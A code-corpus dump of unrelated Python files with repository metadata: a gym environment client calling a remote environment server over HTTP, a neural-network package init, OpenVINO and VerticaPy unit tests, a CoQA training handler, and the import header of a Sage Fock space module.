701c989e503de200104f08eefd68325d4b7710ff
| 2,633
|
py
|
Python
|
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | 5
|
2019-02-28T09:25:58.000Z
|
2021-07-19T08:49:18.000Z
|
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | null | null | null |
simple_virtual_env/virtual_env.py
|
iasawseen/MultiServerRL
|
8460b162eb33eeae35eb01818ac6a5c26fedce0c
|
[
"MIT"
] | null | null | null |
import abc
import json
import gym
import requests
from requests.exceptions import RequestException
import time
import numpy as np
class VirtualEnvironment(gym.Env):
def __init__(self, host_tcp, port_tcp):
self.host_tcp = host_tcp
self.port_tcp = port_tcp
@staticmethod
def _make_request(request, json_data=None):
if json_data is None:
json_data = {}
flag = True
res = None
while flag:
try:
res = requests.post(request, json=json_data).json()
except RequestException:
time.sleep(1)
continue
flag = False
return res
def step(self, action):
json_data = json.dumps({'action': action})
res = self._make_request('http://{host}:{port}/post_step_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['observation'], res['reward'], res['done'], res['info']
def reset(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_reset_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['observation']
def render(self, mode='human'):
json_data = json.dumps({'mode': mode})
res = self._make_request('http://{host}:{port}/post_render_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
res['screen'] = np.array(res['screen'])
return res['screen']
def close(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_close_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
def seed(self, seed=None):
json_data = json.dumps({'seed': seed})
res = self._make_request('http://{host}:{port}/post_close_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
@property
def state(self):
json_data = json.dumps({})
res = self._make_request('http://{host}:{port}/post_state_request/'.format(host=self.host_tcp,
port=self.port_tcp), json_data)
return res['state']
| 39.298507
| 115
| 0.511204
|
5633ec7f19016782b04a11f1d5f885bd9cf0a05d
| 341
|
py
|
Python
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 5
|
2019-07-09T20:56:10.000Z
|
2020-02-13T19:31:47.000Z
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 1
|
2021-06-01T23:59:21.000Z
|
2021-06-01T23:59:21.000Z
|
nnlib/__init__.py
|
AleksaC/nnlib
|
5ad0fd570471626e9994100c844e1ed1493d94bd
|
[
"MIT"
] | 1
|
2019-08-19T11:00:55.000Z
|
2019-08-19T11:00:55.000Z
|
from . import autodiff
from . import datasets
from . import layers
from . import utils
from . import activations
from . import callbacks
from . import config
from . import initializers
from . import losses
from . import metrics
from . import optimizers
from . import regularizers
from .core import Model, load_model
__version__ = "0.0.1"
| 18.944444
| 35
| 0.771261
|
0cab848fbc2f19477d7233e2587496458033b2fd
| 1,531
|
py
|
Python
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 1,127
|
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 439
|
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/unit_tests/mo/back/kaldi_remove_memory_output_test.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 414
|
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from openvino.tools.mo.back.kaldi_remove_memory_output import KaldiRemoveMemoryOutputBackReplacementPattern
from unit_tests.utils.graph import build_graph
class KaldiRemoveMemoryOutputTest(unittest.TestCase):
nodes = {
'input_node': {
'kind': 'data'
},
'memory_node': {
'op': 'Assign',
'kind': 'op'
},
'output_node': {
'kind': 'data'
},
'op_output': {
'kind': 'data',
'op': 'Result',
}
}
def test_remove_out_data_for_memory(self):
graph = build_graph(self.nodes,
[
('input_node', 'memory_node'),
('memory_node', 'output_node'),
('output_node', 'op_output')
])
KaldiRemoveMemoryOutputBackReplacementPattern().find_and_replace_pattern(graph)
self.assertNotIn('output_node', graph.node)
def test_do_not_remove_out_data_for_memory(self):
graph = build_graph(self.nodes,
[
('input_node', 'memory_node'),
('memory_node', 'output_node'),
])
KaldiRemoveMemoryOutputBackReplacementPattern().find_and_replace_pattern(graph)
self.assertIn('output_node', graph.node)
| 33.282609
| 107
| 0.530372
|
e5c34ab0d06992ccf38cfa6ecd9d993f547983ae
| 12,775
|
py
|
Python
|
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | 6
|
2019-01-23T09:16:56.000Z
|
2020-06-01T10:00:42.000Z
|
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | null | null | null |
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | 2
|
2019-07-30T16:23:45.000Z
|
2019-12-16T19:46:04.000Z
|
import time
from utils.data_utils import prepare_datasets
from utils import constants as Constants
from model import Model
import torch
import os
import json
from torch.utils.data import DataLoader
from utils.timer import Timer
from utils.logger import ModelLogger
from utils.eval_utils import AverageMeter
from utils.data_utils import sanitize_input, vectorize_input, sanitize_input_dialog_batched, vectorize_input_dialog_batched
class ModelHandler(object):
"""High level model_handler that trains/validates/tests the network,
tracks and logs metrics.
"""
def __init__(self, config):
self.logger = ModelLogger(config, dirname=config['dir'], pretrained=config['pretrained'])
self.dirname = self.logger.dirname
cuda = config['cuda']
cuda_id = config['cuda_id']
if not cuda:
self.device = torch.device('cpu')
else:
self.device = torch.device('cuda' if cuda_id < 0 else 'cuda:%d' % cuda_id)
datasets = prepare_datasets(config)
train_set = datasets['train']
dev_set = datasets['dev']
test_set = datasets['test']
# Evaluation Metrics:
self._train_loss = AverageMeter()
self._train_f1 = AverageMeter()
self._train_em = AverageMeter()
self._dev_f1 = AverageMeter()
self._dev_em = AverageMeter()
if train_set:
self.train_loader = DataLoader(train_set, batch_size=config['batch_size'],
shuffle=config['shuffle'], collate_fn=lambda x: x, pin_memory=True)
self._n_train_batches = len(train_set) // config['batch_size']
else:
self.train_loader = None
if dev_set:
self.dev_loader = DataLoader(dev_set, batch_size=config['batch_size'],
shuffle=False, collate_fn=lambda x: x, pin_memory=True)
self._n_dev_batches = len(dev_set) // config['batch_size']
else:
self.dev_loader = None
if test_set:
self.test_loader = DataLoader(test_set, batch_size=config['batch_size'], shuffle=False,
collate_fn=lambda x: x, pin_memory=True)
self._n_test_batches = len(test_set) // config['batch_size']
self._n_test_examples = len(test_set)
else:
self.test_loader = None
self._n_train_examples = 0
self.model = Model(config, train_set)
self.model.network = self.model.network.to(self.device)
self.config = self.model.config
self.is_test = False
def train(self):
if self.train_loader is None or self.dev_loader is None:
print("No training set or dev set specified -- skipped training.")
return
self.is_test = False
timer = Timer("Train")
self._epoch = self._best_epoch = 0
if self.dev_loader is not None:
print("\n>>> Dev Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.dev_loader, training=False, verbose=self.config['verbose'])
timer.interval("Validation Epoch {}".format(self._epoch))
format_str = "Validation Epoch {} -- F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._dev_f1.mean(), self._dev_em.mean()))
self._best_f1 = self._dev_f1.mean()
self._best_em = self._dev_em.mean()
if self.config['save_params']:
self.model.save(self.dirname)
self._reset_metrics()
while self._stop_condition(self._epoch):
self._epoch += 1
print("\n>>> Train Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.train_loader, training=True, verbose=self.config['verbose'])
train_epoch_time = timer.interval("Training Epoch {}".format(self._epoch))
format_str = "Training Epoch {} -- Loss: {:0.4f}, F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._train_loss.mean(),
self._train_f1.mean(), self._train_em.mean()))
print("\n>>> Dev Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.dev_loader, training=False, verbose=self.config['verbose'])
timer.interval("Validation Epoch {}".format(self._epoch))
format_str = "Validation Epoch {} -- F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._dev_f1.mean(), self._dev_em.mean()))
if self._best_f1 <= self._dev_f1.mean(): # Can be one of loss, f1, or em.
self._best_epoch = self._epoch
self._best_f1 = self._dev_f1.mean()
self._best_em = self._dev_em.mean()
if self.config['save_params']:
self.model.save(self.dirname)
print("!!! Updated: F1: {:0.2f}, EM: {:0.2f}".format(self._best_f1, self._best_em))
self._reset_metrics()
self.logger.log(self._train_loss.last, Constants._TRAIN_LOSS_EPOCH_LOG)
self.logger.log(self._train_f1.last, Constants._TRAIN_F1_EPOCH_LOG)
self.logger.log(self._train_em.last, Constants._TRAIN_EM_EPOCH_LOG)
self.logger.log(self._dev_f1.last, Constants._DEV_F1_EPOCH_LOG)
self.logger.log(self._dev_em.last, Constants._DEV_EM_EPOCH_LOG)
self.logger.log(train_epoch_time, Constants._TRAIN_EPOCH_TIME_LOG)
timer.finish()
self.training_time = timer.total
print("Finished Training: {}".format(self.dirname))
print(self.summary())
def test(self):
if self.test_loader is None:
print("No testing set specified -- skipped testing.")
return
self.is_test = True
self._reset_metrics()
timer = Timer("Test")
output = self._run_epoch(self.test_loader, training=False, verbose=0,
out_predictions=self.config['out_predictions'],
out_attentions=self.config['save_attn_weights'])
if self.config['dialog_batched']:
# Slightly different id format
_id = None
turn = 0
for ex in output:
if ex['id'] != _id:
_id = ex['id']
turn = 0
ex['id'] = _id
ex['turn_id'] = turn
turn += 1
else:
for ex in output:
_id = ex['id']
ex['id'] = _id[0]
ex['turn_id'] = _id[1]
if self.config['out_predictions']:
output_file = os.path.join(self.dirname, Constants._PREDICTION_FILE)
with open(output_file, 'w') as outfile:
json.dump(output, outfile, indent=4)
if self.config['out_predictions_csv']:
import pandas as pd
for o in output:
o['gold_answer_1'], o['gold_answer_2'], o['gold_answer_3'], o['gold_answer_4'] = o['gold_answers']
output_csv = pd.DataFrame(output)
output_csv = output_csv[[
'id', 'turn_id', 'span_start', 'span_end',
'answer',
'gold_answer_1',
'gold_answer_2',
'gold_answer_3',
'gold_answer_4',
'f1', 'em'
]]
output_csv.to_csv(output_file.replace('.json', '.csv'),
index=False)
test_f1 = self._dev_f1.mean()
test_em = self._dev_em.mean()
timer.finish()
print(self.report(self._n_test_batches, None, test_f1, test_em, mode='test'))
self.logger.log([test_f1, test_em], Constants._TEST_EVAL_LOG)
print("Finished Testing: {}".format(self.dirname))
def _run_epoch(self, data_loader, training=True, verbose=10, out_predictions=False, out_attentions=None):
start_time = time.time()
output = []
for step, input_batch in enumerate(data_loader):
if self.config['dialog_batched']:
x_batches = []
for ib in input_batch:
ib_sanitized = sanitize_input_dialog_batched(ib, self.config, self.model.word_dict,
self.model.feature_dict, training=training)
x_batch = vectorize_input_dialog_batched(ib_sanitized, self.config, training=training,
device=self.device)
if not x_batch:
continue # When there are no target spans present in the batch
x_batches.append(x_batch)
else:
input_batch = sanitize_input(input_batch, self.config, self.model.word_dict,
self.model.feature_dict, training=training)
x_batch = vectorize_input(input_batch, self.config, training=training,
device=self.device)
if not x_batch:
continue # When there are no target spans present in the batch
x_batches = [x_batch] # Singleton list.
res = self.model.predict(x_batches, update=training, out_predictions=out_predictions, out_attentions=out_attentions)
loss = res['loss']
f1 = res['f1']
em = res['em']
total_ex = sum(xb['batch_size'] for xb in x_batches)
self._update_metrics(loss, f1, em, total_ex, training=training)
if training:
self._n_train_examples += total_ex
if (verbose > 0) and (step % verbose == 0):
mode = "train" if training else ("test" if self.is_test else "dev")
print(self.report(step, loss, f1 * 100, em * 100, mode))
print('used_time: {:0.2f}s'.format(time.time() - start_time))
if out_predictions:
for id, prediction, span, f1, em, ans in zip(res['ids'], res['predictions'], res['spans'], res['f1s'], res['ems'], res['answers']):
output.append({'id': id,
'answer': prediction,
'span_start': span[0],
'span_end': span[1],
'f1': f1,
'em': em,
'gold_answers': ans})
return output
def report(self, step, loss, f1, em, mode='train'):
if mode == "train":
format_str = "[train-{}] step: [{} / {}] | exs = {} | loss = {:0.4f} | f1 = {:0.2f} | em = {:0.2f}"
return format_str.format(self._epoch, step, self._n_train_batches, self._n_train_examples, loss, f1, em)
elif mode == "dev":
return "[predict-{}] step: [{} / {}] | f1 = {:0.2f} | em = {:0.2f}".format(
self._epoch, step, self._n_dev_batches, f1, em)
elif mode == "test":
return "[test] | test_exs = {} | step: [{} / {}] | f1 = {:0.2f} | em = {:0.2f}".format(
self._n_test_examples, step, self._n_test_batches, f1, em)
else:
raise ValueError('mode = {} not supported.' % mode)
def summary(self):
start = " <<<<<<<<<<<<<<<< MODEL SUMMARY >>>>>>>>>>>>>>>> "
info = "Best epoch = {}\nDev F1 = {:0.2f}\nDev EM = {:0.2f}".format(
self._best_epoch, self._best_f1, self._best_em)
end = " <<<<<<<<<<<<<<<< MODEL SUMMARY >>>>>>>>>>>>>>>> "
return "\n".join([start, info, end])
def _update_metrics(self, loss, f1, em, batch_size, training=True):
if training:
self._train_loss.update(loss, batch_size)
self._train_f1.update(f1 * 100, batch_size)
self._train_em.update(em * 100, batch_size)
else:
self._dev_f1.update(f1 * 100, batch_size)
self._dev_em.update(em * 100, batch_size)
def _reset_metrics(self):
self._train_loss.reset()
self._train_f1.reset()
self._train_em.reset()
self._dev_f1.reset()
self._dev_em.reset()
def _stop_condition(self, epoch):
"""
Checks have not exceeded max epochs and has not gone 10 epochs without improvement.
"""
no_improvement = epoch >= self._best_epoch + 10
exceeded_max_epochs = epoch >= self.config['max_epochs']
return False if exceeded_max_epochs or no_improvement else True
| 45.462633
| 147
| 0.55319
|
5f5dabc13dc38625ae81cd1c0915d182b65c104e
| 16,074
|
py
|
Python
|
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | 1
|
2018-10-08T07:15:26.000Z
|
2018-10-08T07:15:26.000Z
|
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | null | null | null |
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | null | null | null |
# (c) Copyright [2018-2021] Micro Focus or one of its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest, warnings
import matplotlib.pyplot as plt
from verticapy import vDataFrame, drop
from verticapy import set_option
set_option("print_info", False)
@pytest.fixture(scope="module")
def titanic_vd(base):
from verticapy.datasets import load_titanic
titanic = load_titanic(cursor=base.cursor)
yield titanic
with warnings.catch_warnings(record=True) as w:
drop(
name="public.titanic", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def amazon_vd(base):
from verticapy.datasets import load_amazon
amazon = load_amazon(cursor=base.cursor)
yield amazon
with warnings.catch_warnings(record=True) as w:
drop(
name="public.amazon", cursor=base.cursor,
)
class TestvDFCorrelation:
def test_vDF_acf(self, amazon_vd):
# spearmann method
result1 = amazon_vd.acf(
ts="date",
column="number",
p=20,
by=["state"],
unit="month",
method="spearman",
)
plt.close("all")
assert result1["value"][0] == pytest.approx(1)
assert result1["confidence"][0] == pytest.approx(0.024396841824873748, 1e-2)
assert result1.values["value"][10] == pytest.approx(0.494663471420921, 1e-2)
assert result1.values["confidence"][10] == pytest.approx(
0.06977116419369607, 1e-2
)
# pearson method
result2 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=[1, 3, 6, 7],
unit="year",
method="pearson",
)
plt.close("all")
assert result2["value"][0] == pytest.approx(1)
assert result2["confidence"][0] == pytest.approx(0.024396841824873748, 1e-2)
assert result2["value"][4] == pytest.approx(0.367, 1e-2)
assert result2["confidence"][4] == pytest.approx(0.04080280865931269, 1e-2)
# Autocorrelation Heatmap for each 'month' lag
result3 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=12,
unit="month",
method="pearson",
round_nb=3,
acf_type="heatmap",
)
plt.close("all")
assert result3["index"][1].replace('"', "") == "lag_12_number"
assert result3["number"][1] == pytest.approx(0.778, 1e-2)
assert result3["index"][5].replace('"', "") == "lag_10_number"
assert result3["number"][5] == pytest.approx(0.334, 1e-2)
# Autocorrelation Line for each 'month' lag
result4 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=12,
unit="month",
method="pearson",
acf_type="line",
)
plt.close("all")
assert result4["value"][1] == pytest.approx(0.752, 1e-2)
assert result4["confidence"][1] == pytest.approx(0.03627598368700659, 1e-2)
assert result4["value"][6] == pytest.approx(-0.06, 1e-2)
assert result4["confidence"][6] == pytest.approx(0.05273251493184901, 1e-2)
def test_vDF_corr(self, titanic_vd):
#
# PEARSON
#
# testing vDataFrame.corr (method = 'pearson')
result1 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="pearson",
)
plt.close("all")
assert result1["survived"][0] == 1.0
assert result1["survived"][1] == pytest.approx(-0.0422446185581737, 1e-2)
assert result1["survived"][2] == pytest.approx(0.264150360783869, 1e-2)
assert result1["age"][0] == pytest.approx(-0.0422446185581737, 1e-2)
assert result1["age"][1] == 1.0
assert result1["age"][2] == pytest.approx(0.178575164117464, 1e-2)
assert result1["fare"][0] == pytest.approx(0.264150360783869, 1e-2)
assert result1["fare"][1] == pytest.approx(0.178575164117464, 1e-2)
assert result1["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'pearson') with focus
result1_f = titanic_vd.corr(method="pearson", focus="survived",)
plt.close("all")
assert result1_f["survived"][1] == pytest.approx(-0.336, 1e-2)
assert result1_f["survived"][2] == pytest.approx(0.264, 1e-2)
#
# SPEARMAN
#
# testing vDataFrame.corr (method = 'spearman')
titanic_vd_gb = titanic_vd.groupby(
["age"], ["AVG(survived) AS survived", "AVG(fare) AS fare"]
)
titanic_vd_gb = titanic_vd_gb.groupby(
["fare"], ["AVG(age) AS age", "AVG(survived) AS survived"]
)
titanic_vd_gb = titanic_vd_gb.groupby(
["survived"], ["AVG(age) AS age", "AVG(fare) AS fare"]
)
result2 = titanic_vd_gb.corr(
columns=["survived", "age", "fare"], method="spearman",
)
plt.close("all")
assert result2["survived"][0] == 1.0
assert result2["survived"][1] == pytest.approx(-0.221388367729831, 1e-2)
assert result2["survived"][2] == pytest.approx(0.425515947467167, 1e-2)
assert result2["age"][0] == pytest.approx(-0.221388367729831, 1e-2)
assert result2["age"][1] == 1.0
assert result2["age"][2] == pytest.approx(0.287617260787992, 1e-2)
assert result2["fare"][0] == pytest.approx(0.425515947467167, 1e-2)
assert result2["fare"][1] == pytest.approx(0.287617260787992, 1e-2)
assert result2["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'spearman') with focus
result2_f = titanic_vd_gb.corr(focus="survived", method="spearman",)
plt.close("all")
assert result2_f["survived"][1] == pytest.approx(0.425515947467167, 1e-2)
assert result2_f["survived"][2] == pytest.approx(-0.221388367729831, 1e-2)
#
# KENDALL
#
# testing vDataFrame.corr (method = 'kendall')
result3 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="kendall",
)
plt.close("all")
assert result3["survived"][0] == 1.0
assert result3["survived"][1] == pytest.approx(-0.0149530691050183, 1e-2)
assert result3["survived"][2] == pytest.approx(0.264138930414481, 1e-2)
assert result3["age"][0] == pytest.approx(-0.0149530691050183, 1e-2)
assert result3["age"][1] == 1.0
assert result3["age"][2] == pytest.approx(0.0844989716189637, 1e-2)
assert result3["fare"][0] == pytest.approx(0.264138930414481, 1e-2)
assert result3["fare"][1] == pytest.approx(0.0844989716189637, 1e-2)
assert result3["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'kendall') with focus
result3_f = titanic_vd.corr(focus="survived", method="kendall",)
plt.close("all")
assert result3_f["survived"][1] == pytest.approx(-0.317426126117454, 1e-2)
assert result3_f["survived"][2] == pytest.approx(0.264138930414481, 1e-2)
#
# BISERIAL POINT
#
# testing vDataFrame.corr (method = 'biserial')
result4 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="biserial",
)
plt.close("all")
assert result4["survived"][0] == 1.0
assert result4["survived"][1] == pytest.approx(-0.0422234273762242, 1e-2)
assert result4["survived"][2] == pytest.approx(0.264043222121672, 1e-2)
assert result4["age"][0] == pytest.approx(-0.0422234273762242, 1e-2)
assert result4["age"][1] == 1.0
assert result4["fare"][0] == pytest.approx(0.264043222121672, 1e-2)
assert result4["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'biserial') with focus
result4_f = titanic_vd.corr(focus="survived", method="biserial",)
plt.close("all")
assert result4_f["survived"][1] == pytest.approx(-0.335720838027055, 1e-2)
assert result4_f["survived"][2] == pytest.approx(0.264043222121672, 1e-2)
#
# CRAMER'S V
#
# testing vDataFrame.corr (method = 'cramer')
result5 = titanic_vd.corr(
columns=["survived", "pclass", "embarked"], method="cramer"
)
plt.close("all")
assert result5["survived"][0] == 1.0
assert result5["survived"][1] == pytest.approx(0.3358661117846154, 1e-2)
assert result5["survived"][2] == pytest.approx(0.18608072188932145, 1e-2)
assert result5["pclass"][0] == pytest.approx(0.3358661117846154, 1e-2)
assert result5["pclass"][1] == 1.0
assert result5["pclass"][2] == pytest.approx(0.27453049870161333, 1e-2)
assert result5["embarked"][0] == pytest.approx(0.18608072188932145, 1e-2)
assert result5["embarked"][1] == pytest.approx(0.27453049870161333, 1e-2)
assert result5["embarked"][2] == 1.0
# testing vDataFrame.corr (method = 'cramer') with focus
result5_f = titanic_vd.corr(focus="survived", method="cramer",)
plt.close("all")
assert result5_f["survived"][1] == pytest.approx(0.73190924565401, 1e-2)
assert result5_f["survived"][2] == pytest.approx(0.6707486879228794, 1e-2)
def test_vDF_corr_pvalue(self, titanic_vd):
assert titanic_vd.corr_pvalue("age", "fare", "pearson") == (
pytest.approx(0.178575164117468, 1e-2),
pytest.approx(1.3923308548466764e-08, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "spearman") == (
pytest.approx(0.0045193585753828, 1e-2),
pytest.approx(0.8899833744540833, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallA") == (
pytest.approx(0.12796714496175657, 1e-2),
pytest.approx(1.4735187810450437e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallB") == (
pytest.approx(0.0844989716189637, 1e-2),
pytest.approx(1.1056646764730614e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallC") == (
pytest.approx(0.12919864967860847, 1e-2),
pytest.approx(1.1056646764730614e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("survived", "fare", "biserial") == (
pytest.approx(0.264043222121672, 1e-2),
pytest.approx(4.097598100216442e-21, 1e-2),
)
assert titanic_vd.corr_pvalue("survived", "pclass", "cramer") == (
pytest.approx(0.3358661117846154, 1e-2),
pytest.approx(3.507947423216931e-61, 1e-2),
)
def test_vDF_cov(self, titanic_vd):
# testing vDataFrame.cov
result = titanic_vd.cov(columns=["survived", "age", "fare"],)
plt.close("all")
assert result["survived"][0] == pytest.approx(0.231685181342251, 1e-2)
assert result["survived"][1] == pytest.approx(-0.297583583247234, 1e-2)
assert result["survived"][2] == pytest.approx(6.69214075159394, 1e-2)
assert result["age"][0] == pytest.approx(-0.297583583247234, 1e-2)
assert result["age"][1] == pytest.approx(208.169014723609, 1e-2)
assert result["age"][2] == pytest.approx(145.057125218791, 1e-2)
assert result["fare"][0] == pytest.approx(6.69214075159394, 1e-2)
assert result["fare"][1] == pytest.approx(145.057125218791, 1e-2)
assert result["fare"][2] == pytest.approx(2769.36114247479, 1e-2)
# testing vDataFrame.cov with focus
result_f = titanic_vd.cov(
columns=["survived", "age", "fare"], focus="survived",
)
assert result_f["survived"][0] == pytest.approx(6.69214075159394, 1e-2)
assert result_f["survived"][1] == pytest.approx(-0.297583583247234, 1e-2)
assert result_f["survived"][2] == pytest.approx(0.231685181342251, 1e-2)
plt.close("all")
def test_vDF_iv_woe(self, titanic_vd):
# testing vDataFrame.iv_woe
result = titanic_vd.iv_woe("survived",)
plt.close("all")
assert result["iv"][0] == pytest.approx(0.552533238835721)
assert result["iv"][1] == pytest.approx(0.498896347729338)
assert result["iv"][2] == pytest.approx(0.21502042620992767)
# testing vDataFrame[].iv_woe
result2 = titanic_vd["pclass"].iv_woe("survived",)
assert result2["iv"][-1] == pytest.approx(0.21502042620992767)
assert result2["non_events"][-1] == pytest.approx(784)
def test_vDF_pacf(self, amazon_vd):
# testing vDataFrame.pacf
result = amazon_vd.pacf(
column="number", ts="date", by=["state"], p=5,
)
plt.close("all")
assert result["value"][0] == 1.0
assert result["value"][1] == pytest.approx(0.672667529541858, 1e-2)
assert result["value"][2] == pytest.approx(-0.188727403801382, 1e-2)
assert result["value"][3] == pytest.approx(0.022206688265849, 1e-2)
assert result["value"][4] == pytest.approx(-0.0819798501305434, 1e-2)
assert result["value"][5] == pytest.approx(-0.00663606854011195, 1e-2)
def test_vDF_regr(self, titanic_vd):
# testing vDataFrame.regr (method = 'alpha')
result1 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="alpha",
)
plt.close("all")
assert result1["survived"][0] == 0.0
assert result1["survived"][1] == pytest.approx(0.435280333103508, 1e-2)
assert result1["survived"][2] == pytest.approx(0.282890247028015, 1e-2)
assert result1["age"][0] == pytest.approx(30.6420462046205, 1e-2)
assert result1["age"][1] == 0.0
assert result1["age"][2] == pytest.approx(28.4268042866199, 1e-2)
assert result1["fare"][0] == pytest.approx(23.425595019157, 1e-2)
assert result1["fare"][1] == pytest.approx(16.1080039795446, 1e-2)
assert result1["fare"][2] == 0.0
# testing vDataFrame.regr (method = 'beta')
result2 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="beta"
)
plt.close("all")
assert result2["survived"][0] == 1.0
assert result2["survived"][1] == pytest.approx(-0.00142952871080426, 1e-2)
assert result2["survived"][2] == pytest.approx(0.00241649261591561, 1e-2)
assert result2["age"][0] == pytest.approx(-1.2483889156179, 1e-2)
assert result2["age"][1] == 1.0
assert result2["age"][2] == pytest.approx(0.0456059549185254, 1e-2)
assert result2["fare"][0] == pytest.approx(28.8746643141762, 1e-2)
assert result2["fare"][1] == pytest.approx(0.69923081967147, 1e-2)
assert result2["fare"][2] == 1.0
# testing vDataFrame.regr (method = 'r2')
result3 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="r2",
)
plt.close("all")
assert result3["survived"][0] == 1.0
assert result3["survived"][1] == pytest.approx(0.00178460779712559, 1e-2)
assert result3["survived"][2] == pytest.approx(0.0697754131022489, 1e-2)
assert result3["age"][0] == pytest.approx(0.00178460779712559, 1e-2)
assert result3["age"][1] == 1.0
assert result3["age"][2] == pytest.approx(0.0318890892395806, 1e-2)
assert result3["fare"][0] == pytest.approx(0.0697754131022489, 1e-2)
assert result3["fare"][1] == pytest.approx(0.0318890892395806, 1e-2)
assert result3["fare"][2] == 1.0
| 43.918033
| 84
| 0.596678
|
33e9eb0d686a4c3a2fe38b47707d1f72142e00a0
| 82,500
|
py
|
Python
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 1,742
|
2015-01-04T07:06:13.000Z
|
2022-03-30T11:32:52.000Z
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 66
|
2015-03-19T19:17:24.000Z
|
2022-03-16T11:59:30.000Z
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 495
|
2015-01-10T10:23:18.000Z
|
2022-03-24T22:06:11.000Z
|
# -*- coding: utf-8 -*-
r"""
Fock Space
AUTHORS:
- Travis Scrimshaw (2013-05-03): Initial version
"""
# ****************************************************************************
# Copyright (C) 2013-2017 Travis Scrimshaw <tcscrims at gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.global_options import GlobalOptions
from sage.categories.modules_with_basis import ModulesWithBasis
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
